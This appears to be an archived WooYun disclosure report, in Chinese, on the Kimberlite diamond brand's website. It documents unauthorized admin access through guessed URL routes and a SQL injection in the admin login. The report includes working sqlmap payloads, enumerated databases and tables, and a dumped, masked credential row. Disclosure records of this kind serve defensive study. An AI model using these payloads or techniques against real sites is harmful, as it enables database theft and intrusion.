乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-16: 细节已通知厂商并且等待厂商处理中 2016-01-20: 厂商已经确认,细节仅向厂商公开 2016-01-30: 细节向核心白帽子及相关领域专家公开 2016-02-09: 细节向普通白帽子公开 2016-02-19: 细节向实习白帽子公开 2016-03-06: 细节向公众公开
金伯利钻石未授权访问/sql注入打包/getshell
金伯利钻石官网奇葩姿势进后台,敏感地址泄露,未授权访问(附送后台登录处sql注入)#1http://**.**.**.**/index.php?r=site/detail&pid=307这是一个普通的页面,看到地址有点奇怪,于是访问:http://**.**.**.**/index.php?r=site/detail奇葩的一幕出现了:
根据网站的地址定义规则尝试了一下:http://**.**.**.**/index.php?r=site/manage
http://**.**.**.**/index.php?r=site/main
直接进入后台页面 - -!
如上,附送后台登录页面sql注入(因为后台是在手工注入的时候一不小心就进去了- -!所以打包)http://**.**.**.**:80/index.php?r=site/bg-login (POST)
直接报错
敏感信息
SQLMAP
金伯利钻石官网SQL注入http://**.**.**.**:80/index.php?r=site/bg-login (POST)
sqlmap identified the following injection point(s) with a total of 220 HTTP(s) requests:---Parameter: account (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: account=-1898' OR 8667=8667#&pwd=1 Type: UNION query Title: MySQL UNION query (NULL) - 4 columns Payload: account=1' UNION ALL SELECT NULL,CONCAT(0x716b7a6271,0x67416d50437a754e76587a6964534171626e5750464359567249715959796b5357464a5343775946,0x7162627071),NULL,NULL#&pwd=1---web application technology: PHP 5.6.15, Nginxback-end DBMS: MySQL >= 5.0.0sqlmap resumed the following injection point(s) from stored session:---Parameter: account (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: account=-1898' OR 8667=8667#&pwd=1 Type: UNION query Title: MySQL UNION query (NULL) - 4 columns Payload: account=1' UNION ALL SELECT NULL,CONCAT(0x716b7a6271,0x67416d50437a754e76587a6964534171626e5750464359567249715959796b5357464a5343775946,0x7162627071),NULL,NULL#&pwd=1---web application technology: PHP 5.6.15, Nginxback-end DBMS: MySQL 5available databases [7]:[*] information_schema[*] kella[*] kim[*] kimberlite[*] mysql[*] performance_schema[*] testsqlmap resumed the following injection point(s) from stored session:---Parameter: account (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: account=-1898' OR 8667=8667#&pwd=1 Type: UNION query Title: MySQL UNION query (NULL) - 4 columns Payload: account=1' UNION ALL SELECT NULL,CONCAT(0x716b7a6271,0x67416d50437a754e76587a6964534171626e5750464359567249715959796b5357464a5343775946,0x7162627071),NULL,NULL#&pwd=1---web application technology: PHP 5.6.15, Nginxback-end DBMS: MySQL 5Database: kim[26 tables]+------------------+| join || user || application || brand || caption || classic || classic_list || config || desginer || desginer_list || huodong || images || jiamengshang || jm || kd_list || member || new_push || news || picture || product || product_categroy || product_type || source || sqlmapoutput || story_video || zuanshi |+------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: account (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: account=-1898' OR 8667=8667#&pwd=1 Type: UNION query Title: MySQL UNION query (NULL) - 4 columns Payload: account=1' UNION ALL SELECT NULL,CONCAT(0x716b7a6271,0x67416d50437a754e76587a6964534171626e5750464359567249715959796b5357464a5343775946,0x7162627071),NULL,NULL#&pwd=1---web application technology: PHP 5.6.15, Nginxback-end DBMS: MySQL 5Database: kimTable: user[1 entry]+------------+------------+| account | pwd |+------------+------------+| kim******* | kim******* |+------------+------------+
注出账号密码,进入后台#2 getshell
过滤!验证!
危害等级:中
漏洞Rank:10
确认时间:2016-01-20 10:14
CNVD未直接复现所述情况,暂未建立与网站管理单位的直接处置渠道,待认领。
暂无
